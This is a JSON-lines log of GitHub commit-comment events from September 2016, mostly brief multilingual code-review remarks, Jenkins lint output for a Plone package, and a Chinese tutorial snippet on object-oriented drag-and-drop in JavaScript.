{"id":"4636575797","type":"CommitCommentEvent","actor":{"login":"yumengq"},"repo":{"name":"yumengq/gitone"},"payload":{"comment":{"id":19222081,"position":null,"line":null,"path":null,"commit_id":"787c7f010bc4de816546527344723c1037e67e60","created_at":"2016-09-29T11:15:41Z","updated_at":"2016-09-29T11:15:41Z","body":"<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n\t<meta charset=\"UTF-8\">\r\n\t<title> 面向对象拖拽 </title>\r\n</head>\r\n<style>\r\n\t#box{\r\n\t\tposition: absolute;\r\n\t\twidth: 200px; height: 200px; background-color: #f00;\r\n\t}\r\n</style>\r\n<body>\r\n\t\r\n\t<div id=\"box\">\r\n\t\t\r\n\t</div>\r\n\r\n\t<script>\r\n\t\t// 1. 全局变量 拿出来  全都变成对象的属性 ;\r\n\t\t// 2. 避免函数嵌套函数的过程 ;\r\n\t\t// 3. 注意this的使用  this始终是对象 不可能是标签\r\n\t\t// 4. 注意事件 指向经常发生变化  \r\n\r\n\r\n\t\tvar box = document.getElementById(\"box\");\r\n\t\tvar disx = 0;\r\n\t\tvar disy = 0;\r\n\r\n\r\n\t\tbox.onmousedown=function  (ev) {\r\n\t\t\t\tfnDown(ev)\r\n\t\t\t\tdocument.onmousemove=function  (ev) {\r\n\t\t\t\t\tfnMove(ev)\r\n\t\t\t\t}\r\n\t\t\t\tdocument.onmouseup=function  () {\r\n\t\t\t\t\tfnUp()\r\n\t\t\t\t}\r\n\t\t}\r\n\r\n\r\n\t\tfunction fnMove (ev) {\r\n\t\t\tvar ev = window.event||ev;\r\n\t\t\tbox.style.left = ev.clientX - disx + \"px\";\r\n\t\t\tbox.style.top = ev.clientY - disy  + \"px\";\r\n\t\t}\r\n\r\n\t\tfunction fnUp () {\r\n\t\t\tdocument.onmousemove = null;\r\n\t\t\tdocument.onmouseup = null\r\n\t\t}\r\n\r\n\t\tfunction fnDown  (ev) {\r\n\t\t\tvar ev = window.event||ev;\r\n\t\t\tdisx = ev.clientX - box.offsetLeft;\r\n\t\t\tdisy = ev.clientY - box.offsetTop;\r\n\t\t}\r\n\r\n\r\n\t\t \r\n\r\n\t\t// 面向对象的格式\r\n\r\n\t\t // function 构造函数(参数){\r\n\r\n\t\t // \tthis.属性 =参数 ；\r\n\r\n\t\t // }\r\n\r\n\t\t // 构造函数.原型.方法名  = function  (argument) {\r\n\t\t \t \r\n\t\t // \t // 语句块\r\n\t\t // }\r\n\r\n\t\t // 变量 = new 构造函数 （参数）\r\n\r\n\t\t // 变量.方法名（）\r\n\r\n\r\n\r\n\r\n\t\twindow.onload=function  (argument) {\r\n\t\t\t// var box = document.getElementById(\"box\");\r\n\t\t\t// var disx = 0;\r\n\t\t\t// var disy = 0;\t\r\n\r\n\t\t\t// 1. 没有对象 首先要new 对象 \t\t \r\n\t\t\tvar d1 = new Drag(\"box\")  \r\n\t\t\t// 2. 所有完成的事件\t\t\t   \r\n\t\t\td1.init(); //初始化方法\r\n\t\t\t// var $ = new Object(id)\r\n\t\t\t// $(\"selector\").html()\r\n\t\t}\r\n\r\n\t\t\t// 3.实例化的过程 所有的全局变量 变成属性 \r\n\t\tfunction Drag (id) {\r\n\t\t\tthis.box = document.getElementById(id);\r\n\t\t\tthis.disx = 0;\r\n\t\t\tthis.disy = 0;\t\t\r\n\t\t}\r\n\t\t\t// 4.this 指的就是new  new就是对象\r\n\t\tDrag.prototype.init=function  (argument) {\r\n\r\n\t\t\tvar _this =  this  //方便始终指向一个对象\r\n\t\t\t\r\n\t\t\tthis.box.onmousedown=function  (ev) {\r\n\t\t\t\t\tvar ev = window.event||ev;\r\n\t\t\t\t\t\r\n\t\t\t\t\tconsole.log(this)\r\n\t\t\t\t\t\r\n\t\t\t\t\t_this.mDown(ev)\r\n\t\t\t}\r\n\t\t\t \r\n\t\t}\r\n\t\t\t// prototype CSS  style 行内样式 行间样式\r\n\r\n\t\t\t// Drag.sort() 内联和外联的形式\r\n\r\n\r\n\r\n\r\n\t\tDrag.prototype.mDown=function  (ev) {\r\n\r\n\t\t\tvar This = this;\r\n\t\t\tthis.disx = ev.clientX - this.box.offsetLeft;\r\n\t\t\tthis.disy = ev.clientY - this.box.offsetTop;\r\n\t\t\tdocument.onmousemove=function  (ev) {\r\n\t\t\t\t\t\tvar ev = window.event||ev;\r\n\t\t\t\t\t\tThis.mMove(ev)\r\n\t\t\t\t\t}\r\n\t\t\t\t\tdocument.onmouseup=function  () {\r\n\t\t\t\t\t"}},"created_at":"2016-09-29T11:15:41Z"}
{"id":"4636579600","type":"CommitCommentEvent","actor":{"login":"lvc"},"repo":{"name":"lvc/abi-compliance-checker"},"payload":{"comment":{"id":19222090,"position":48,"line":819,"path":"abi-compliance-checker.pl","commit_id":"26742a8c630e5dd42838a8c2faf4bb4f8e59c393","created_at":"2016-09-29T11:16:34Z","updated_at":"2016-09-29T11:16:34Z","body":"Fixed by the commit 868b1354cc4e1ebcad06358f6f6baf4a71491530.\r\n\r\nThanks a lot!"}},"created_at":"2016-09-29T11:16:34Z"}
{"id":"4636582185","type":"CommitCommentEvent","actor":{"login":"idma88"},"repo":{"name":"idma88/site-req"},"payload":{"comment":{"id":19222092,"position":null,"line":null,"path":null,"commit_id":"9de6c34d09d525ca548329819be30ab3319eb502","created_at":"2016-09-29T11:17:10Z","updated_at":"2016-09-29T11:17:10Z","body":"Done [issue #9]"}},"created_at":"2016-09-29T11:17:10Z"}
{"id":"4636584696","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19222096,"position":null,"line":null,"path":null,"commit_id":"bb4742efe4de474f894cbc43924ed38300a237fe","created_at":"2016-09-29T11:17:46Z","updated_at":"2016-09-29T11:17:46Z","body":"#347"}},"created_at":"2016-09-29T11:17:46Z"}
{"id":"4636598059","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19222121,"position":48,"line":582,"path":"cura/Settings/MachineManager.py","commit_id":"bfa92b6b400ef257421d311d9739e964f1f69692","created_at":"2016-09-29T11:20:56Z","updated_at":"2016-09-29T11:20:56Z","body":"Note that unfortuantely there is not always a \"normal\" to fall back to. Eg UM2+ with 0.25mm nozzle only has a \"high\" quality profile."}},"created_at":"2016-09-29T11:20:56Z"}
{"id":"4636598419","type":"CommitCommentEvent","actor":{"login":"pitr-ch"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19222123,"position":null,"line":null,"path":null,"commit_id":"d4a8f66619dff48776aa680df4775e24341a2331","created_at":"2016-09-29T11:21:00Z","updated_at":"2016-09-29T11:21:00Z","body":"Nice 👍 "}},"created_at":"2016-09-29T11:21:00Z"}
{"id":"4636603436","type":"CommitCommentEvent","actor":{"login":"mingxuWang"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19222134,"position":19,"line":19,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-29T11:22:13Z","updated_at":"2016-09-29T11:22:13Z","body":"要考虑小数的话使用parseFloat()就可以了吧。"}},"created_at":"2016-09-29T11:22:13Z"}
{"id":"4636603992","type":"CommitCommentEvent","actor":{"login":"webteckie"},"repo":{"name":"keystonejs/keystone"},"payload":{"comment":{"id":19222136,"position":3,"line":3,"path":"test/e2e/adminUI/tests/group005Fields/testRelationshipField.js","commit_id":"136b6249b8b10fa0afc251f3fe67b76d12a260d8","created_at":"2016-09-29T11:22:21Z","updated_at":"2016-09-29T11:22:21Z","body":"See, this is why I made the comment about keeping the previous XXXModelTestConfig names for the default as well :=)  It looks a bit weird."}},"created_at":"2016-09-29T11:22:21Z"}
{"id":"4636608751","type":"CommitCommentEvent","actor":{"login":"FooBarWidget"},"repo":{"name":"phusion/passenger"},"payload":{"comment":{"id":19222151,"position":3,"line":3,"path":"src/agent/Core/SecurityUpdateChecker.h","commit_id":"776582f16757849e93622f0823eb379094b05dab","created_at":"2016-09-29T11:23:25Z","updated_at":"2016-09-29T11:23:25Z","body":"It's only 2016 for this file."}},"created_at":"2016-09-29T11:23:25Z"}
{"id":"4636609145","type":"CommitCommentEvent","actor":{"login":"jogrimst"},"repo":{"name":"jogrimst/literacyapp-analytics"},"payload":{"comment":{"id":19222156,"position":null,"line":null,"path":null,"commit_id":"09517b59cab9e9003fc374262bcdd58df1faf21f","created_at":"2016-09-29T11:23:32Z","updated_at":"2016-09-29T11:23:32Z","body":"@sladomic That's a very good question, thank you. The reason was just to get the bytes, for the `IOUtils.write` method. But I see now that the amount of code can be reduced. See updated version at https://github.com/jogrimst/literacyapp-analytics/commit/ea54b94fdbbf4d303975dfe8df71cb8ccb29581d"}},"created_at":"2016-09-29T11:23:32Z"}
{"id":"4636610801","type":"CommitCommentEvent","actor":{"login":"FooBarWidget"},"repo":{"name":"phusion/passenger"},"payload":{"comment":{"id":19222158,"position":32,"line":32,"path":"src/agent/Core/SecurityUpdateChecker.h","commit_id":"776582f16757849e93622f0823eb379094b05dab","created_at":"2016-09-29T11:23:54Z","updated_at":"2016-09-29T11:23:54Z","body":"#defines within an #ifdef should be indented."}},"created_at":"2016-09-29T11:23:54Z"}
{"id":"4636614052","type":"CommitCommentEvent","actor":{"login":"kevinswat"},"repo":{"name":"crynetsystems/nfs"},"payload":{"comment":{"id":19222166,"position":5,"line":58,"path":"src/net/fs/server/FSServer.java","commit_id":"03ee58a8391a4d12bd7ce7d0ac818bd80a71e85f","created_at":"2016-09-29T11:24:38Z","updated_at":"2016-09-29T11:24:38Z","body":"这份代码干了2件事情，1.启动了服务2.配置了防火墙"}},"created_at":"2016-09-29T11:24:38Z"}
{"id":"4636618319","type":"CommitCommentEvent","actor":{"login":"Adit1313"},"repo":{"name":"Adit1313/JDev"},"payload":{"comment":{"id":19222175,"position":null,"line":null,"path":null,"commit_id":"f3e71e877a696e66300c26986e8ad2cbc9197e89","created_at":"2016-09-29T11:25:37Z","updated_at":"2016-09-29T11:25:37Z","body":"BS update"}},"created_at":"2016-09-29T11:25:37Z"}
{"id":"4636619142","type":"CommitCommentEvent","actor":{"login":"yzaki"},"repo":{"name":"gfacciol/homebrew-keckcaves"},"payload":{"comment":{"id":19222178,"position":null,"line":null,"path":null,"commit_id":"4b8c8eb91d18075b7542497674119370bfdc1e91","created_at":"2016-09-29T11:25:48Z","updated_at":"2016-09-29T11:25:48Z","body":"How can I apply this so that I can install it?"}},"created_at":"2016-09-29T11:25:48Z"}
{"id":"4636622271","type":"CommitCommentEvent","actor":{"login":"AlexOugh"},"repo":{"name":"SungardAS/aws-services"},"payload":{"comment":{"id":19222181,"position":null,"line":null,"path":null,"commit_id":"e59733569682ee8b110b089109bce8da28380f67","created_at":"2016-09-29T11:26:32Z","updated_at":"2016-09-29T11:26:32Z","body":"looking good."}},"created_at":"2016-09-29T11:26:32Z"}
{"id":"4636622661","type":"CommitCommentEvent","actor":{"login":"techieshark"},"repo":{"name":"BoyCook/TwitterJSClient"},"payload":{"comment":{"id":19222183,"position":null,"line":null,"path":null,"commit_id":"b9f60bef345b07e8b7bf8d4ad2a41e72da9671ce","created_at":"2016-09-29T11:26:37Z","updated_at":"2016-09-29T11:26:37Z","body":"Following this commit, the line\r\n\r\n```\r\nvar configPath = \"data/twitter_config\";\r\n```\r\n\r\nis useless, right?"}},"created_at":"2016-09-29T11:26:37Z"}
{"id":"4636624042","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19222186,"position":28,"line":78,"path":"cura/QualityManager.py","commit_id":"4bb6ddaf28ae2f5a93d59d25fa479d594aff1d5c","created_at":"2016-09-29T11:26:55Z","updated_at":"2016-09-29T11:26:55Z","body":"Can you please clearly document the different between these two?"}},"created_at":"2016-09-29T11:26:55Z"}
{"id":"4636627627","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.z3cform"},"payload":{"comment":{"id":19222190,"position":null,"line":null,"path":null,"commit_id":"8251e0ebfcabca2b941fe7cd4f33205ee873477d","created_at":"2016-09-29T11:27:45Z","updated_at":"2016-09-29T11:27:45Z","body":"@mauritsvanrees Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.app.z3cform/45/violations\n```\nplone/app/z3cform/inline_validation.py:15:1: C901 'InlineValidationView.__call__' is too complex (15)\nplone/app/z3cform/tests/test_utils.py:21:9: E731 do not assign a lambda expression, use a def\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-29T11:27:45Z"}
{"id":"4636629882","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.z3cform"},"payload":{"comment":{"id":19222197,"position":null,"line":null,"path":null,"commit_id":"3ed66a1dc8e2b111f1a482e2cb0c6d7e93f341c3","created_at":"2016-09-29T11:28:16Z","updated_at":"2016-09-29T11:28:16Z","body":"@mauritsvanrees Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.app.z3cform/46/violations\n```\nplone/__init__.py:0:1: C101 Coding magic comment not found\nplone/app/__init__.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/converters.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/csrf.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/inline_validation.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/inline_validation.py:14:1: C901 'InlineValidationView.__call__' is too complex (12)\nplone/app/z3cform/inline_validation.py:23:12: P002 found \"hasattr\", consider replacing it\nplone/app/z3cform/inline_validation.py:25:16: P002 found \"hasattr\", consider replacing it\nplone/app/z3cform/inline_validation.py:29:26: Q000 Remove bad quotes.\nplone/app/z3cform/inline_validation.py:34:9: E265 block comment should start with '# '\nplone/app/z3cform/inline_validation.py:41:17: E731 do not assign a lambda expression, use a def\nplone/app/z3cform/interfaces.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/interfaces.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/interfaces.py:6:80: E501 line too long (85 > 79 characters)\nplone/app/z3cform/layout.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/layout.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/layout.py:2:1: F401 'FormWrapper' imported but unused\nplone/app/z3cform/layout.py:2:1: F401 'wrap_form' imported but unused\nplone/app/z3cform/object.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/object.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/templates.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/templates.py:13:1: E731 do not assign a lambda expression, use a def\nplone/app/z3cform/utils.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/utils.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/widget.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/widget.py:7:80: E501 line too long (83 > 79 characters)\nplone/app/z3cform/widget.py:147:29: Q000 Remove bad quotes.\nplone/app/z3cform/widget.py:338:80: E501 line too long (84 > 79 characters)\nplone/app/z3cform/widget.py:359:26: Q000 Remove bad quotes.\nplone/app/z3cform/widget.py:359:27: S001 found %s formatter\nplone/app/z3cform/widget.py:444:80: E501 line too long (84 > 79 characters)\nplone/app/z3cform/widget.py:453:80: E501 line too long (84 > 79 characters)\nplone/app/z3cform/widget.py:456:30: Q000 Remove bad quotes.\nplone/app/z3cform/widget.py:456:31: S001 found %s formatter\nplone/app/z3cform/widget.py:535:58: Q000 Remove bad quotes.\nplone/app/z3cform/widget.py:584:35: P101 format string does contain unindexed parameters\nplone/app/z3cform/widget.py:595:42: P101 format string does contain unindexed parameters\nplone/app/z3cform/widget.py:596:44: P101 format string does contain unindexed parameters\nplone/app/z3cform/widget.py:598:34: P101 format string does contain unindexed parameters\nplone/app/z3cform/widget.py:621:28: P101 format string does contain unindexed parameters\nplone/app/z3cform/queryselect/__init__.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/queryselect/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/queryselect/__init__.py:17:21: Q000 Remove bad quotes.\nplone/app/z3cform/queryselect/__init__.py:17:80: E501 line too long (97 > 79 characters)\nplone/app/z3cform/queryselect/__init__.py:18:21: Q000 Remove bad quotes.\nplone/app/z3cform/wysiwyg/__init__.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/wysiwyg/__init__.py:2:1: F401 'WysiwygFieldWidget' imported but unused\nplone/app/z3cform/wysiwyg/widget.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/wysiwyg/widget.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/wysiwyg/widget.py:43:17: Q000 Remove bad quotes.\nplone/app/z3cform/wysiwyg/widget.py:43:80: E501 line too long (84 > 79 characters)\nplone/app/z3cform/wysiwyg/widget.py:44:17: Q000 Remove bad quotes.\nplone/app/z3cform/tests/example.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/tests/example.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/tests/example.py:16:16: Q000 Remove bad quotes.\nplone/app/z3cform/tests/layer.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/tests/layer.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/tests/layer.py:33:10: Q000 Remove bad quotes.\nplone/app/z3cform/tests/test_csrf.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/tests/test_objectsubform.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/tests/test_objectsubform.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/tests/test_objectsubform.py:34:35: S001 found %s formatter\nplone/app/z3cform/tests/test_widget.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/tests/test_widget.py:32:80: E501 line too long (126 > 79 characters)\nplone/app/z3cform/tests/test_widgets.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/tests/test_widgets.py:549:14: D001 found assertEquals replace it with assertEqual\nplone/app/z3cform/tests/test_widgets.py:552:14: D001 found assertEquals replace it with assertEqual\nplone/app/z3cform/tests/test_widgets.py:769:36: D001 found directlyProvides replace it with zope.interface.provider\nplone/app/z3cform/tests/test_widgets.py:771:9: D001 found directlyProvides replace it with zope.interface.provider\nplone/app/z3cform/tests/test_widgets.py:893:80: E501 line too long (89 > 79 characters)\nplone/app/z3cform/tests/test_widgets.py:902:80: E501 line too long (90 > 79 characters)\nplone/app/z3cform/tests/test_widgets.py:1105:14: D001 found assertEquals replace it with assertEqual\nplone/app/z3cform/tests/test_widgets.py:1144:80: E501 line too long (81 > 79 characters)\nplone/app/z3cform/tests/test_widgets.py:1167:80: E501 line too long (82 > 79 characters)\nplone/app/z3cform/tests/test_widgets.py:1253:14: D001 found assertEquals replace it with assertEqual\nplone/app/z3cform/tests/test_widgets.py:1268:14: D001 found assertEquals replace it with assertEqual\nplone/app/z3cform/tests/test_widgets.py:1276:39: Q000 Remove bad quotes.\nplone/app/z3cform/tests/tests.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/tests/tests.py:0:1: I001 isort found changes, run it on the file\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-29T11:28:16Z"}
{"id":"4636631901","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19222203,"position":127,"line":126,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T11:28:47Z","updated_at":"2016-09-29T11:28:47Z","body":"Нельзя, строки всегда передаются по ссылке, а не по значению"}},"created_at":"2016-09-29T11:28:47Z"}
{"id":"4636633449","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19222211,"position":null,"line":null,"path":null,"commit_id":"806e00434c34aa6c3911c2148292902f2782ffdb","created_at":"2016-09-29T11:29:09Z","updated_at":"2016-09-29T11:29:09Z","body":"Why did you remove the handling of ctx from `TestDisint` ???"}},"created_at":"2016-09-29T11:29:09Z"}
{"id":"4636634273","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19222213,"position":null,"line":null,"path":null,"commit_id":"b36348e436dfc0fc128b3617b921b3bc5cbe03d6","created_at":"2016-09-29T11:29:20Z","updated_at":"2016-09-29T11:29:20Z","body":"Thanks, I will stop the test"}},"created_at":"2016-09-29T11:29:20Z"}
{"id":"4636636273","type":"CommitCommentEvent","actor":{"login":"mingxuWang"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19222218,"position":93,"line":93,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-29T11:29:48Z","updated_at":"2016-09-29T11:29:48Z","body":"selectFlag这样的命名方式像是一个Boolean类型的值吗。\r\nselectable的命名方式是否更合适。"}},"created_at":"2016-09-29T11:29:48Z"}
{"id":"4636639179","type":"CommitCommentEvent","actor":{"login":"FooBarWidget"},"repo":{"name":"phusion/passenger"},"payload":{"comment":{"id":19222223,"position":369,"line":369,"path":"src/agent/Core/SecurityUpdateChecker.h","commit_id":"776582f16757849e93622f0823eb379094b05dab","created_at":"2016-09-29T11:30:28Z","updated_at":"2016-09-29T11:30:28Z","body":"This function is very long. My preference is to split such functions up in smaller ones."}},"created_at":"2016-09-29T11:30:28Z"}
{"id":"4636641223","type":"CommitCommentEvent","actor":{"login":"FrancoisNeveu"},"repo":{"name":"MartinMoizard/Progressable"},"payload":{"comment":{"id":19222227,"position":null,"line":null,"path":null,"commit_id":"5bbb85489d177798736ba47ae6472631cafc7637","created_at":"2016-09-29T11:30:57Z","updated_at":"2016-09-29T11:30:57Z","body":"Please merge !"}},"created_at":"2016-09-29T11:30:57Z"}
{"id":"4636642333","type":"CommitCommentEvent","actor":{"login":"jstockwin"},"repo":{"name":"keystonejs/keystone"},"payload":{"comment":{"id":19222229,"position":3,"line":3,"path":"test/e2e/adminUI/tests/group005Fields/testRelationshipField.js","commit_id":"136b6249b8b10fa0afc251f3fe67b76d12a260d8","created_at":"2016-09-29T11:31:13Z","updated_at":"2016-09-29T11:31:13Z","body":"Yeah, I understand what you mean. I'll change it back at some point if I get time. "}},"created_at":"2016-09-29T11:31:13Z"}
{"id":"4636642513","type":"CommitCommentEvent","actor":{"login":"FooBarWidget"},"repo":{"name":"phusion/passenger"},"payload":{"comment":{"id":19222230,"position":451,"line":451,"path":"src/agent/Core/SecurityUpdateChecker.h","commit_id":"776582f16757849e93622f0823eb379094b05dab","created_at":"2016-09-29T11:31:16Z","updated_at":"2016-09-29T11:31:16Z","body":"Coding style: prefer `signatureChars == NULL` over `!signatureChars`"}},"created_at":"2016-09-29T11:31:16Z"}
{"id":"4636644867","type":"CommitCommentEvent","actor":{"login":"mingxuWang"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19222234,"position":144,"line":144,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-29T11:31:51Z","updated_at":"2016-09-29T11:31:51Z","body":"我也觉得使用的话最好还是传进去吧。"}},"created_at":"2016-09-29T11:31:51Z"}
{"id":"4636646995","type":"CommitCommentEvent","actor":{"login":"FooBarWidget"},"repo":{"name":"phusion/passenger"},"payload":{"comment":{"id":19222241,"position":41,"line":41,"path":"src/cxx_supportlib/Crypto.h","commit_id":"776582f16757849e93622f0823eb379094b05dab","created_at":"2016-09-29T11:32:20Z","updated_at":"2016-09-29T11:32:20Z","body":"This typedef should be inside the Passenger namespace in order to avoid potential conflicts."}},"created_at":"2016-09-29T11:32:20Z"}
{"id":"4636652975","type":"CommitCommentEvent","actor":{"login":"kyrsjo"},"repo":{"name":"JamesMolson/SixTrack"},"payload":{"comment":{"id":19222255,"position":48,"line":66526,"path":"SixTrack/sixtrack.s","commit_id":"5bba141f3377b45a00d4af5f75bdeaacb919c002","created_at":"2016-09-29T11:33:47Z","updated_at":"2016-09-29T11:33:47Z","body":"Should there be a merlin routine here?"}},"created_at":"2016-09-29T11:33:47Z"}
{"id":"4636654665","type":"CommitCommentEvent","actor":{"login":"ochiait"},"repo":{"name":"ochiait/kadai_asagao"},"payload":{"comment":{"id":19222260,"position":null,"line":null,"path":null,"commit_id":"c1870e4a375269991658f086709939b095641869","created_at":"2016-09-29T11:34:11Z","updated_at":"2016-09-29T11:34:11Z","body":"rails routesで表示されるリスト\r\n\r\ncategory_calendar_items GET\r\n /categories/:category/calendar_items(.:format) \r\ncalendar_items#category_calendar_items\r\n↓\r\ncategory_calendar_items_path(category: k)\r\nとすることで\r\n/categories/:category/calendar_items\r\nが表現できる\r\n"}},"created_at":"2016-09-29T11:34:11Z"}
{"id":"4636655137","type":"CommitCommentEvent","actor":{"login":"kyrsjo"},"repo":{"name":"JamesMolson/SixTrack"},"payload":{"comment":{"id":19222261,"position":18,"line":66080,"path":"SixTrack/sixtrack.s","commit_id":"5bba141f3377b45a00d4af5f75bdeaacb919c002","created_at":"2016-09-29T11:34:17Z","updated_at":"2016-09-29T11:34:17Z","body":"Please fix indentation :)"}},"created_at":"2016-09-29T11:34:17Z"}
{"id":"4636655875","type":"CommitCommentEvent","actor":{"login":"Silex"},"repo":{"name":"Silex/emacs-config"},"payload":{"comment":{"id":19222265,"position":null,"line":null,"path":null,"commit_id":"a7c1ac88285cdc07b3907091e5e61e9d2e2e3ecd","created_at":"2016-09-29T11:34:28Z","updated_at":"2016-09-29T11:34:28Z","body":"@kaushalmodi: yes I know about this variable.\r\n\r\nI started using it then decided to switch back to explicit `:ensure`, I forgot why tho :grin: \r\n\r\nIf I remember I'll tell you."}},"created_at":"2016-09-29T11:34:28Z"}
{"id":"4636656618","type":"CommitCommentEvent","actor":{"login":"kyrsjo"},"repo":{"name":"JamesMolson/SixTrack"},"payload":{"comment":{"id":19222270,"position":61,"line":66558,"path":"SixTrack/sixtrack.s","commit_id":"5bba141f3377b45a00d4af5f75bdeaacb919c002","created_at":"2016-09-29T11:34:39Z","updated_at":"2016-09-29T11:34:39Z","body":"Merlin routine?"}},"created_at":"2016-09-29T11:34:39Z"}
{"id":"4636657712","type":"CommitCommentEvent","actor":{"login":"kyrsjo"},"repo":{"name":"JamesMolson/SixTrack"},"payload":{"comment":{"id":19222274,"position":74,"line":66595,"path":"SixTrack/sixtrack.s","commit_id":"5bba141f3377b45a00d4af5f75bdeaacb919c002","created_at":"2016-09-29T11:34:55Z","updated_at":"2016-09-29T11:34:55Z","body":"Merlin routine here?"}},"created_at":"2016-09-29T11:34:55Z"}
{"id":"4636658823","type":"CommitCommentEvent","actor":{"login":"mattbrailsford"},"repo":{"name":"leekelleher/umbraco-ditto-labs"},"payload":{"comment":{"id":19222280,"position":null,"line":null,"path":null,"commit_id":"07432a3f4b776ef0274fbc6f0ffcc5b6f45a5e15","created_at":"2016-09-29T11:35:09Z","updated_at":"2016-09-29T11:35:09Z","body":"Ahh, sorry, didn't notice the params are :)"}},"created_at":"2016-09-29T11:35:09Z"}
{"id":"4636660438","type":"CommitCommentEvent","actor":{"login":"jacob4684"},"repo":{"name":"jacob4684/Polymorphism"},"payload":{"comment":{"id":19222284,"position":14,"line":14,"path":"PersonPolymorphism/Person.cs","commit_id":"4d4c5e9f3505b16af05b633be19e91732626984f","created_at":"2016-09-29T11:35:28Z","updated_at":"2016-09-29T11:35:28Z","body":"hvad skal den være den har ikke nogen type?"}},"created_at":"2016-09-29T11:35:28Z"}
{"id":"4636660856","type":"CommitCommentEvent","actor":{"login":"mingxuWang"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19222286,"position":152,"line":152,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-29T11:35:34Z","updated_at":"2016-09-29T11:35:34Z","body":"这个用法是不是不好，data是在`formatPostParam`这个方法中定义的局部变量，`formatSelectedData`方法直接将传入的data进行了修改。"}},"created_at":"2016-09-29T11:35:34Z"}
{"id":"4636660935","type":"CommitCommentEvent","actor":{"login":"mattbrailsford"},"repo":{"name":"leekelleher/umbraco-ditto-labs"},"payload":{"comment":{"id":19222287,"position":null,"line":null,"path":null,"commit_id":"07432a3f4b776ef0274fbc6f0ffcc5b6f45a5e15","created_at":"2016-09-29T11:35:35Z","updated_at":"2016-09-29T11:35:35Z","body":"*arg "}},"created_at":"2016-09-29T11:35:35Z"}
{"id":"4636661173","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19222289,"position":null,"line":null,"path":null,"commit_id":"9f2cd557fb2e16fbf9a4af40a93beec34194c5fb","created_at":"2016-09-29T11:35:38Z","updated_at":"2016-09-29T11:35:38Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=35)"}},"created_at":"2016-09-29T11:35:38Z"}
{"id":"4636663791","type":"CommitCommentEvent","actor":{"login":"kyrsjo"},"repo":{"name":"JamesMolson/SixTrack"},"payload":{"comment":{"id":19222291,"position":8,"line":4,"path":"SixTrack/merlinscatter/makefile","commit_id":"5bba141f3377b45a00d4af5f75bdeaacb919c002","created_at":"2016-09-29T11:36:14Z","updated_at":"2016-09-29T11:36:14Z","body":"Rename `merlinscatter_interface.a` -> `merlinscatter.a`, which contains `merlinscatter_interface.o`"}},"created_at":"2016-09-29T11:36:14Z"}
